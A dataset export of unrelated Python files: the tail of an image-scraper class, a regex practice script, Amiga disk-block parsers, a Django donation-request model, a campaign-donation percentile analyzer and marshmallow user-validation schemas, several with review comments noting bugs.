    def parse_objid(self, url: str, is_collection: bool = False) -> str:
        """Parse the objid from a topic (or collection) page.

        In collection mode this also records the collection name and the
        owning user's id/name on ``self``.

        :param url: URL of the topic or collection
        :return: objid
        """
        soup = BeautifulSoup(session_request(url).text, 'html.parser')
        objid = soup.find('input', id='dataInput').attrs.get('data-objid')
        if is_collection:
            self._collection_name = soup.find('h2', class_='title-h2').text
            user = soup.find(name='span', class_='details-user-avatar')
            self.user_id = user.find('div').attrs.get('data-id')
            self.username = user.find('a').attrs.get('title')
        return objid

    def parse_images(self, scrapy):
        """Scrape one topic: resolve its objid, call the works API, and queue
        image-download tasks from the returned image list.

        :param scrapy: task record for the topic
        :return Scrapy: the same task record
        """
        objid = scrapy.objid or self.parse_objid(scrapy.url)
        resp = session_request(urljoin(HOST_PAGE, WORK_SUFFIX.format(objid=objid)))
        data = resp.json().get('data', {})
        author = data.get('product', {}).get('creatorObj', {}).get('username')
        title = data.get('product', {}).get('title')
        objid = data.get('product', {}).get('id')
        for img in data.get('allImageList', []):
            new_scrapy = Scrapy(type='image', author=author, title=title,
                                objid=objid, index=img.get('orderNo') or 0, url=img.get('url'))
            if new_scrapy not in self.stat["images_pass"]:
                self.images.put(new_scrapy)
                self.stat["nimages"] += 1
        return scrapy

    def fetch_images(self):
        """Drain the topic queue and resolve topics into images on the pool."""
        image_futures = {}
        while True:
            try:
                scrapy = self.topics.get(timeout=Q_TIMEOUT)
                image_futures[self.pool.submit(self.parse_images, scrapy)] = scrapy
            except Empty:
                # only stop once page parsing has finished feeding the queue
                if self.END_PARSING_TOPICS:
                    break
            except Exception:
                continue
        for future in as_completed(image_futures):
            scrapy = image_futures.get(future)
            try:
                future.result()
                self.stat["topics_pass"].add(scrapy)
            except Exception:
                self.stat["topics_fail"].add(scrapy)
                cprint(f'GET topic: {scrapy.title} ({scrapy.url}) failed.', 'red')

    def fetch_all(self, initialized: bool = False):
        """Scrape homepages and topics concurrently while showing status."""
        if not initialized:
            self.generate_pages()
        fetch_futures = [self.pool.submit(self.fetch_topics),
                         self.pool.submit(self.fetch_images)]
        end_show_fetch = False
        t = threading.Thread(target=self.show_fetch_status, kwargs={'end': lambda: end_show_fetch})
        t.start()
        try:
            wait(fetch_futures)
        except KeyboardInterrupt:
            raise
        finally:
            end_show_fetch = True
            t.join()

    def show_fetch_status(self, interval=0.5, end=None):
        """Background-thread loop: print fetch progress while scraping.

        :param int interval: refresh interval, seconds
        :param function end: callable used to signal the loop to exit
        """
        while True:
            status = 'Fetched Pages: {pages}\tTopics: {topics}\tImages: {images}'.format(
                pages=colored(str(self.max_pages).rjust(3), 'blue'),
                topics=colored(str(self.stat["ntopics"]).rjust(3), 'blue'),
                images=colored(str(self.stat["nimages"]).rjust(5), 'blue'))
            print(status, end='\r', flush=True)
            if (interval == 0) or (end and end()):
                print('\n')
                break
            time.sleep(interval)

    def show_download_status(self, interval=0.5, end=None):
        """Background-thread loop: print download progress while downloading.

        :param int interval: refresh interval, seconds
        :param function end: callable used to signal the loop to exit
        """
        while True:
            completed = len(self.stat["images_pass"]) + len(self.stat["images_fail"])
            if self.stat["nimages"] > 0:
                status = 'Time used: {time_used}\tFailed: {failed}\tCompleted: {completed}'.format(
                    time_used=colored(str(datetime.now() - self.start_time)[:-7], 'yellow'),
                    failed=colored(str(len(self.stat["images_fail"])).rjust(3), 'red'),
                    completed=colored(str(int(completed / self.stat["nimages"] * 100))
                                      + f'% ({completed}/{self.stat["nimages"]})', 'green'))
                print(status, end='\r', flush=True)
            if (interval == 0) or (end and end()):
                if self.stat["nimages"] > 0:
                    print('\n')
                break
            time.sleep(interval)

    def download_image(self, scrapy):
        """Download one image and save it under the topic's directory.

        Skips the download when the file already exists and overwrite is off.

        :param scrapy: task record for the image
        :return Scrapy: the same task record
        """
        try:
            name = re.findall(r'(?<=/)\w*?\.(?:jpg|gif|png|bmp)', scrapy.url, re.IGNORECASE)[0]
        except IndexError:
            name = uuid4().hex + '.jpg'
        path = self.directory / safe_filename(scrapy.title)
        filename = path / f'[{scrapy.index + 1 or 0:02d}]{name}'
        if (not self.overwrite) and op.isfile(filename):
            return scrapy
        url = scrapy.url
        if self.thumbnail:
            # append ZCool's resize suffix to fetch a 1280px-wide thumbnail
            if url.lower().endswith(('jpg', 'png', 'bmp')):
                url = f'{scrapy.url}@1280w_1l_2o_100sh.{url[-3:]}'
        resp = session_request(url)
        mkdirs_if_not_exist(path)
        with open(filename, 'wb') as f:
            for chunk in resp.iter_content(8192):
                f.write(chunk)
        return scrapy

    def save_records(self):
        """Save the success and failure records to a local JSON file.

        :return str: absolute path of the record file
        """
        filename = f'{safe_filename(self.start_time.isoformat()[:-7])}.json'
        abspath = op.abspath(self.directory / filename)
        with open(abspath, 'w', encoding='utf-8') as f:
            success = (self.stat["pages_pass"] | self.stat["topics_pass"] | self.stat["images_pass"])
            fail = (self.stat["pages_fail"] | self.stat["topics_fail"] | self.stat["images_fail"])
            type_order = {'page': 1, 'topic': 2, 'image': 3}
            s_ordered = sort_records(success, order=type_order)
            f_ordered = sort_records(fail, order=type_order)
            records = {
                'time': self.start_time.isoformat(),
                'success': [scrapy._asdict() for scrapy in s_ordered],
                'fail': [scrapy._asdict() for scrapy in f_ordered]
            }
            f.write(json.dumps(records, ensure_ascii=False, indent=2))
        return abspath

    def run_scraper(self):
        """Download all queued images on the pool, then save records and exit."""
        end_show_download = False
        t = threading.Thread(target=self.show_download_status, kwargs={'end': lambda: end_show_download})
        t.start()
        image_futuress = {}
        while True:
            try:
                scrapy = self.images.get_nowait()
                if scrapy not in self.stat["images_pass"]:
                    image_futuress[self.pool.submit(self.download_image, scrapy)] = scrapy
            except Empty:
                break
            except KeyboardInterrupt:
                raise
            except Exception:
                continue
        try:
            for future in as_completed(image_futuress):
                scrapy = image_futuress.get(future)
                try:
                    future.result()
                    self.stat["images_pass"].add(scrapy)
                except Exception:
                    self.stat["images_fail"].add(scrapy)
                    cprint(f'Download image: {scrapy.title}[{scrapy.index + 1}] '
                           f'({scrapy.url}) failed.', 'red')
        except KeyboardInterrupt:
            raise
        finally:
            end_show_download = True
            t.join()
        saved_images = len(self.stat["images_pass"])
        failed_images = len(self.stat["images_fail"])
        if saved_images or failed_images:
            if saved_images:
                print(f'Saved {colored(saved_images, "green")} images to '
                      f'{colored(self.directory.absolute(), attrs=["underline"])}')
            records_path = self.save_records()
            print(f'Saved records to {colored(records_path, attrs=["underline"])}')
        else:
            cprint('No images to download.', 'yellow')
|
10,595 | 89dddd59f164d8697cd913091625124f738117cd | import re
import urllib.request
# Regex practice script: findall/finditer/sub examples, plus simple web and
# file parsing. Intended to be run top-to-bottom; it performs network and
# file I/O (addresses.html, poem.txt).
string="Michael is my M 30 year old son and lives with his wife Jess who is 25 years old.They have a joint account worth $125000"
ages=re.findall(r'\d{1,3}',string)
names=re.findall(r'[A-Z][a-z]*',string) # looking for strings with a beginning capital letter
#followed by 0 or more small letters
print(ages,names)
print(re.findall(r'[$]\d*',string))
# use of iterator This finds the first and last index of the occurence of the string we
#are looking for eg, this prints the first and last indices of occurrences of inform
# NOTE(review): this rebinds the builtin name `str`; rename the variable.
str="We need to inform him about the latest received information"
for i in re.finditer("inform",str):
    print(i.span())
print(str[11:17])
# s="sat,hat,mat,pat"
# print(re.findall(r'[^h-m]at',s)) this prints anything outside the given range thus, sat and pat
#REPLACE A STRING
items="rome persia greece beijing berlin"
out=re.compile("beijing") #item to be replaced
items=out.sub("Nairobi",items) #new string
print(items)
# phone number verification
num="+254726700973,254705410,0726784166,07234119"
# NOTE(review): `[07]` is a character class matching a SINGLE '0' or '7', not
# the prefix "07"; likewise `[+2547]` matches ONE of '+','2','5','4','7', not
# the literal prefix "+254". The intended patterns are likely r'0\d{9}' and
# r'\+254\d{9}' -- confirm and fix.
re1="[07]\d{9}"
re2="[+2547]\d{12}"
kenyan_phone_num=re.findall(r"(%s|%s)"%(re1,re2),num)
if(kenyan_phone_num):
    print(kenyan_phone_num)
# email verification
emails="sk@gmail.com @gmail.com custom@comp.co.ke dc@.com kk2b@g.com "
# NOTE(review): the dots before the TLD parts are unescaped, so they match any
# character; use r'\.' for a literal dot.
print(re.findall(r'[\w.%+-]{1,20}@[A-Za-z]{2,20}.[A-Za-z]{2,3}| [\w.%+-]{1,20}@[A-Za-z]{2,20}.[A-Za-z]{2,3}.[A-Za-z]{2}',emails))
#simple web parsing
url="http://www.summet.com/dmsi/html/codesamples/addresses.html"
response=urllib.request.urlopen(url)
html=response.read()
html_str=html.decode()
phone_data=re.findall(r'\(\d{3}\) \d{3}-\d{4}',html_str)
# the brackets are preceeded by back-slashes for escaping them. ie, they arent special
#characters but part of the pattern
for i in phone_data:
    print(i)
# from a file
# NOTE(review): file handle is never closed; prefer `with open('poem.txt') as text:`.
text=open('poem.txt')
for line in text:
    line=line.rstrip()# to remove the newline character(\n)
    if re.search(r'[A-Z]{8,}',line):
        print(line)
s='127.0.0.1/blog 748596/blog/hello'
print(re.findall(r'blog[^\s]',s)) # if the carrat sign is included in the range brackets,
# the regex looks for anything apart from what is specified in the regex
# when used outside the range, it means 'match the beggining of a line'
#eg, only give me words that dont start with capital letters.
#^[^A_Z]
10,596 | fa6096641c65844e940b16f49852aef0fb748e28 | from __future__ import absolute_import
from __future__ import print_function
from ..Block import Block
class RDBPhysicalDrive:
    """Physical drive geometry stored in an Amiga Rigid Disk Block."""

    # (attribute, long-word offset) pairs in on-disk layout order
    _FIELDS = (("cyls", 16), ("secs", 17), ("heads", 18), ("interleave", 19),
               ("parking_zone", 20), ("write_pre_comp", 24),
               ("reduced_write", 25), ("step_rate", 26))

    def __init__(self, cyls=0, heads=0, secs=0,
                 interleave=1, parking_zone=-1, write_pre_comp=-1, reduced_write=-1, step_rate=3):
        self.cyls = cyls
        self.heads = heads
        self.secs = secs
        self.interleave = interleave
        # -1 means "default to the cylinder count" for these three fields
        self.parking_zone = cyls if parking_zone == -1 else parking_zone
        self.write_pre_comp = cyls if write_pre_comp == -1 else write_pre_comp
        self.reduced_write = cyls if reduced_write == -1 else reduced_write
        self.step_rate = step_rate

    def dump(self):
        """Print the geometry in human-readable form."""
        print("PhysicalDrive")
        for label in ("cyls", "heads", "secs", "interleave", "parking_zone",
                      "write_pre_comp", "reduced_write", "step_rate"):
            print(" %s: %d" % (label, getattr(self, label)))

    def read(self, blk):
        """Load all geometry fields from a block's long-word slots."""
        for attr, off in self._FIELDS:
            setattr(self, attr, blk._get_long(off))

    def write(self, blk):
        """Store all geometry fields into a block's long-word slots."""
        for attr, off in self._FIELDS:
            blk._put_long(off, getattr(self, attr))
class RDBLogicalDrive:
    """Logical drive parameters stored in an Amiga Rigid Disk Block."""

    # (attribute, long-word offset) pairs in on-disk layout order
    _FIELDS = (("rdb_blk_lo", 32), ("rdb_blk_hi", 33), ("lo_cyl", 34),
               ("hi_cyl", 35), ("cyl_blks", 36), ("auto_park_secs", 37),
               ("high_rdsk_blk", 38))

    def __init__(self, rdb_blk_lo=0, rdb_blk_hi=0, lo_cyl=0, hi_cyl=0,
                 cyl_blks=0, high_rdsk_blk=0, auto_park_secs=0):
        self.rdb_blk_lo = rdb_blk_lo
        self.rdb_blk_hi = rdb_blk_hi
        self.lo_cyl = lo_cyl
        self.hi_cyl = hi_cyl
        self.cyl_blks = cyl_blks
        self.high_rdsk_blk = high_rdsk_blk
        self.auto_park_secs = auto_park_secs

    def dump(self):
        """Print the logical drive parameters in human-readable form."""
        print("LogicalDrive")
        for label in ("rdb_blk_lo", "rdb_blk_hi", "lo_cyl", "hi_cyl",
                      "cyl_blks", "high_rdsk_blk", "auto_park_secs"):
            print(" %s: %d" % (label, getattr(self, label)))

    def read(self, blk):
        """Load all fields from a block's long-word slots."""
        for attr, off in self._FIELDS:
            setattr(self, attr, blk._get_long(off))

    def write(self, blk):
        """Store all fields into a block's long-word slots."""
        for attr, off in self._FIELDS:
            blk._put_long(off, getattr(self, attr))
class RDBDriveID:
    """Vendor/product/revision identification strings from a Rigid Disk Block."""

    # (attribute, long-word offset, max length) triples in on-disk layout order
    _FIELDS = (("disk_vendor", 40, 8), ("disk_product", 42, 16),
               ("disk_revision", 46, 4), ("ctrl_vendor", 47, 8),
               ("ctrl_product", 49, 16), ("ctrl_revision", 53, 4))

    def __init__(self, disk_vendor="", disk_product="", disk_revision="",
                 ctrl_vendor="", ctrl_product="", ctrl_revision=""):
        self.disk_vendor = disk_vendor
        self.disk_product = disk_product
        self.disk_revision = disk_revision
        self.ctrl_vendor = ctrl_vendor
        self.ctrl_product = ctrl_product
        self.ctrl_revision = ctrl_revision

    def dump(self):
        """Print the identification strings in human-readable form."""
        print("DriveID")
        for attr, _, _ in self._FIELDS:
            print(" %s: '%s'" % (attr, getattr(self, attr)))

    def read(self, blk):
        """Load all identification strings from a block."""
        for attr, off, length in self._FIELDS:
            setattr(self, attr, blk._get_cstr(off, length))

    def write(self, blk):
        """Store all identification strings into a block."""
        for attr, off, length in self._FIELDS:
            blk._put_cstr(off, length, getattr(self, attr))
class RDBlock(Block):
    """Rigid Disk Block (RDSK): root block of an Amiga RDB partition table.

    Carries the disk geometry (physical/logical drive, drive id) plus the
    head pointers of the bad-block, partition and filesystem block lists.
    """

    def __init__(self, blkdev, blk_num=0):
        # checksum lives at long-word offset 2; block type must be RDSK
        Block.__init__(self, blkdev, blk_num, chk_loc=2, is_type=Block.RDSK)

    def create(self, phy_drv, log_drv, drv_id,
               host_id=7, block_size=512, flags=0x17,
               badblk_list=Block.no_blk, part_list=Block.no_blk, fs_list=Block.no_blk, init_code=Block.no_blk,
               size=64):
        """Initialize an in-memory RDB with the given geometry and list heads."""
        Block.create(self)
        self.size = size
        self.host_id = host_id
        self.block_size = block_size
        self.flags = flags
        self.badblk_list = badblk_list
        self.part_list = part_list
        self.fs_list = fs_list
        self.init_code = init_code
        self.phy_drv = phy_drv
        self.log_drv = log_drv
        self.drv_id = drv_id
        self.valid = True

    def write(self):
        """Serialize all fields into the block buffer and write it to disk."""
        self._create_data()
        self._put_long(1, self.size)
        self._put_long(3, self.host_id)
        self._put_long(4, self.block_size)
        self._put_long(5, self.flags)
        self._put_long(6, self.badblk_list)
        self._put_long(7, self.part_list)
        self._put_long(8, self.fs_list)
        self._put_long(9, self.init_code)
        self.phy_drv.write(self)
        self.log_drv.write(self)
        self.drv_id.write(self)
        Block.write(self)

    def read(self):
        """Read the block from disk and parse all fields.

        :return bool: True if the block validated as an RDSK block
        """
        Block.read(self)
        if not self.valid:
            return False
        self.size = self._get_long(1)
        self.host_id = self._get_long(3)
        self.block_size = self._get_long(4)
        self.flags = self._get_long(5)
        self.badblk_list = self._get_long(6)
        self.part_list = self._get_long(7)
        self.fs_list = self._get_long(8)
        self.init_code = self._get_long(9)
        self.phy_drv = RDBPhysicalDrive()
        self.phy_drv.read(self)
        self.log_drv = RDBLogicalDrive()
        self.log_drv.read(self)
        self.drv_id = RDBDriveID()
        self.drv_id.read(self)
        return self.valid

    def dump(self):
        """Print the whole RDB, including the nested geometry objects."""
        Block.dump(self, "RigidDisk")
        print(" size: %d" % self.size)
        print(" host_id: %d" % self.host_id)
        print(" block_size: %d" % self.block_size)
        print(" flags: 0x%08x" % self.flags)
        print(" badblk_list: %s" % self._dump_ptr(self.badblk_list))
        print(" part_list: %s" % self._dump_ptr(self.part_list))
        print(" fs_list: %s" % self._dump_ptr(self.fs_list))
        print(" init_code: %s" % self._dump_ptr(self.init_code))
        self.phy_drv.dump()
        self.log_drv.dump()
        self.drv_id.dump()
|
10,597 | b94be32071c1444c7b14f38907642679b9eb14cf | from django.db import models
class Donationreqs(models.Model):
    """Book-donation request mapped onto the legacy ``donationreqs`` table.

    inspectdb-style model: column names/types mirror the existing schema, so
    single-char CharFields act as flags and ``i_date``/``u_date`` are integer
    timestamp columns. Meanings below that are not visible from the schema
    are hedged -- confirm against application code.
    """
    user_id = models.IntegerField()  # requesting donor's user id (no FK in legacy schema)
    volunteer_id = models.IntegerField(blank=True, null=True)  # assigned volunteer, if any
    status = models.IntegerField()  # request state code -- values defined by app logic, not visible here
    mobile = models.CharField(db_column='Mobile', max_length=100, blank=True, null=True)  # Field name made lowercase.
    address = models.TextField()  # pickup address
    landmark = models.CharField(db_column='Landmark', max_length=225, blank=True, null=True)  # Field name made lowercase.
    country = models.CharField(max_length=50)
    state = models.CharField(max_length=200, blank=True, null=True)
    city = models.CharField(max_length=225)
    zipcode = models.IntegerField()
    no_of_book = models.IntegerField()  # declared number of books
    no_of_cartons = models.IntegerField()
    app_books_weight = models.IntegerField()  # approximate weight -- presumably kg; confirm units
    donated_book_category = models.CharField(max_length=255)
    how_do_u_know_abt_us = models.CharField(max_length=225)  # marketing-source survey answer
    wastage = models.IntegerField()
    document_mail_sent = models.CharField(max_length=1)  # single-char flag ('Y'/'N' style -- confirm values)
    is_blocked = models.CharField(max_length=1)  # single-char flag
    i_date = models.IntegerField()  # insert timestamp stored as integer (epoch -- confirm)
    u_date = models.IntegerField(blank=True, null=True)  # update timestamp stored as integer
    is_paid_donation = models.CharField(max_length=1)  # single-char flag
    donor_name = models.CharField(max_length=45, blank=True, null=True)
    pickup_date_time = models.CharField(max_length=255, blank=True, null=True)  # free-form date/time string

    class Meta:
        managed = True
        db_table = 'donationreqs'
|
10,598 | 9994a6fb04188d0d44833f2155fc64028e9af756 | import os
import argparse
import datetime
import math
import heapq
def get_filepaths():
    """Read the input/percentile/output file paths from the command line.

    Positional arguments, in order: itcont, percentile, output.

    Returns:
        input filepath (string)
        output filepath (string)
        percentile filepath (string)
    """
    arg_parser = argparse.ArgumentParser()
    for positional in ('itcont', 'percentile', 'output'):
        arg_parser.add_argument(positional)
    parsed = arg_parser.parse_args()
    # note the return order: input, output, percentile
    return parsed.itcont, parsed.output, parsed.percentile
def parse_itcont(itcont_raw):
    """Parse one pipe-delimited line of itcont.txt and return the fields used
    by the donation-analytics pipeline.

    Parameters:
        itcont_raw (string): raw input line from itcont.txt
    Returns:
        cmtd_id (string)
        name (string)
        zip_code (string)
        year (int)
        trans_amount (int): transaction amount rounded to whole dollars
    Raises:
        ValueError: if the record is malformed (OTHER_ID set, bad zip/date/
        amount, or empty id/name fields)
    """
    itcont = itcont_raw.split('|')
    if itcont[15]:
        raise ValueError('OTHER_ID field contains value')
    cmtd_id = itcont[0]
    name = itcont[7]
    year = get_year(itcont[13])
    zip_code = get_zip_code(itcont[10])
    try:
        trans_amount = int(round(float(itcont[14])))
    # Bug fix: only conversion failures are expected here; the previous bare
    # `except:` also swallowed SystemExit/KeyboardInterrupt.
    except ValueError:
        raise ValueError('Transaction Amount is malformed')
    if not cmtd_id:
        raise ValueError('CMTD ID field does not contain any value')
    if not name:
        raise ValueError('Name field does not contain any value')
    return cmtd_id, name, zip_code, year, trans_amount
def get_zip_code(zip_code):
    """Return the 5-digit prefix of a zip code.

    Parameters:
        zip_code (string): raw zip-code string from itcont.txt
    Returns:
        5-digit zip code (string)
    Raises:
        ValueError: if shorter than 5 characters or not all digits
    """
    if len(zip_code) >= 5 and zip_code.isdigit():
        return zip_code[:5]
    raise ValueError('Invalid zip code')
def get_year(date):
    """Validate a MMDDYYYY date string and return its year.

    Parameters:
        date (string): raw date string from itcont.txt
    Returns:
        year (int)
    Raises:
        ValueError: if the date is malformed
    """
    try:
        # constructing a datetime validates month/day/year ranges in one step
        parsed = datetime.datetime(year=int(date[4:8]),
                                   month=int(date[0:2]),
                                   day=int(date[2:4]))
    except (ValueError, IndexError):
        raise ValueError('Invalid transaction date')
    return parsed.year
def update_repeat_donation(percentile, repeat_donation, trans_amount):
    """Fold one new repeat-donor contribution into the running statistics and
    keep the nearest-rank percentile value available in O(log n).

    Two heaps are maintained: ``max_heap`` stores (negated) the smallest
    ordinal-rank amounts, so its top is exactly the n-th percentile value;
    ``min_heap`` stores the remaining amounts.

    Parameters:
        percentile (float): percentile to track
        repeat_donation (dict): keys 'total_amount', 'num_trans',
            'max_heap', 'min_heap' (see module docs)
        trans_amount (float): new contribution amount
    Returns:
        None (``repeat_donation`` is updated in place)
    """
    repeat_donation['total_amount'] += trans_amount
    repeat_donation['num_trans'] += 1
    # nearest-rank ordinal position of the percentile value
    rank = int(math.ceil(percentile / 100. * repeat_donation['num_trans']))
    lower = repeat_donation['max_heap']
    upper = repeat_donation['min_heap']
    if trans_amount <= -lower[0]:
        heapq.heappush(lower, -trans_amount)
    else:
        heapq.heappush(upper, trans_amount)
    # rebalance so that ``lower`` holds exactly ``rank`` elements
    if len(lower) > rank:
        heapq.heappush(upper, -heapq.heappop(lower))
    if len(lower) < rank:
        heapq.heappush(lower, -heapq.heappop(upper))
def get_repeat_donation_stats(repeat_donation):
    """Return the output triple for one repeat-donation record.

    Parameters:
        repeat_donation (dict): keys 'total_amount', 'num_trans',
            'max_heap', 'min_heap' (see update_repeat_donation)
    Returns:
        total contribution amount (int)
        total number of transactions (int)
        percentile value (int)
    """
    # the top of the max-heap (negated) is the nearest-rank percentile value
    return (repeat_donation['total_amount'],
            repeat_donation['num_trans'],
            -repeat_donation['max_heap'][0])
# Stream itcont.txt line by line, track repeat donors by (name, zip), and for
# each contribution from a repeat donor emit one output line with the running
# percentile value, total amount and transaction count per
# (recipient, zip, year) group.
if __name__ == "__main__":
    itcont_filepath, output_filepath, percentile_filepath = get_filepaths()
    with open(percentile_filepath) as f:
        percentile = float(f.readline())
    repeat_donors_dict = {} # key: (name, zip_code); value: year of contribution.
    repeat_donations_dict = {} # key: (cmtd_id, zip_code, year); value: contribution info
    start_time = datetime.datetime.now()
    with open(itcont_filepath, 'r') as input_file, open(output_filepath, 'w') as output_file:
        itcont_raw = input_file.readline()
        while(itcont_raw): # if new line of itcont.txt is not empty
            try:
                cmtd_id, name, zip_code, year, amount = parse_itcont(itcont_raw)
                if (name, zip_code) in repeat_donors_dict: # this donor is a repeated donor
                    if year >= repeat_donors_dict[(name, zip_code)]: # skips the record if transaction date is for a previous calendar year
                        if (cmtd_id, zip_code, year) in repeat_donations_dict:
                            update_repeat_donation(percentile, repeat_donations_dict[(cmtd_id, zip_code, year)], amount)
                        else:
                            # creates a new repeat donation record
                            max_heap = [-amount] # uses the negative value because heapq only supports min-heap.
                            min_heap = []
                            heapq.heapify(max_heap)
                            heapq.heapify(min_heap)
                            repeat_donations_dict[(cmtd_id, zip_code, year)] = {'max_heap': max_heap,
                                                                                'min_heap': min_heap,
                                                                                'total_amount':amount,
                                                                                'num_trans': 1}
                        total_amount, number_of_transactions, percentile_value \
                            = get_repeat_donation_stats(repeat_donations_dict[(cmtd_id, zip_code, year)])
                        # Writes to output file
                        output_file.write('{}|{}|{}|{}|{}|{}\n'.format(cmtd_id, zip_code, year,
                                          percentile_value, total_amount, number_of_transactions))
                else:
                    # adds donor to repeat_donors_dict
                    repeat_donors_dict[(name, zip_code)] = year
            except ValueError: # If record is malformed, ignore and skip the record
                pass
            itcont_raw = input_file.readline() # reads new line from itcont.txt
    # NOTE(review): Python 2 print statement -- this script targets Python 2;
    # port to print() before running under Python 3.
    print'run time: ', datetime.datetime.now() - start_time
|
10,599 | a27e70dc501ab0beba958fb665736edc3a967293 | """
User validation schemas.
"""
from marshmallow import pre_load, Schema, validates_schema, ValidationError
from marshmallow.fields import Bool, Email, Str
from marshmallow.validate import Length
class BasicUserSchema(Schema):
    """Validates the common user fields: email, first name, last name."""
    email = Email(required=True)
    first_name = Str(required=True, validate=Length(max=100))
    last_name = Str(required=True, validate=Length(max=100))

    @pre_load
    def make_data(self, data, **kwargs):
        """Normalize incoming data before validation: lower-case and strip the
        email, strip whitespace from the name fields.

        NOTE(review): raises KeyError (not a ValidationError) when any of the
        three keys is absent from the payload -- confirm callers always send
        all three, or guard with ``data.get``.
        """
        data['email'] = data.pop('email').lower().strip()
        data['first_name'] = data.pop('first_name').strip()
        data['last_name'] = data.pop('last_name').strip()
        return data
class UserCreateSchema(BasicUserSchema):
    """Schema for creating a user: basic fields plus password confirmation."""
    password = Str(required=True, validate=Length(min=8))
    confirm_password = Str(required=True, validate=Length(min=8))

    @validates_schema
    def validates_password_confirmation(self, data, **kwargs):
        """Reject the payload when the two password fields differ.

        Raises:
            ValidationError: scoped to ``confirm_password`` so the message is
            reported under that field instead of the schema-level key.
        """
        if data['password'] != data['confirm_password']:
            # Bug fix: ValidationError takes the message as its first
            # positional argument; `ValidationError(confirm_password=...)`
            # raised TypeError at runtime because the required message was
            # missing and the keyword is not accepted.
            raise ValidationError("Passwords didn't match",
                                  field_name='confirm_password')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.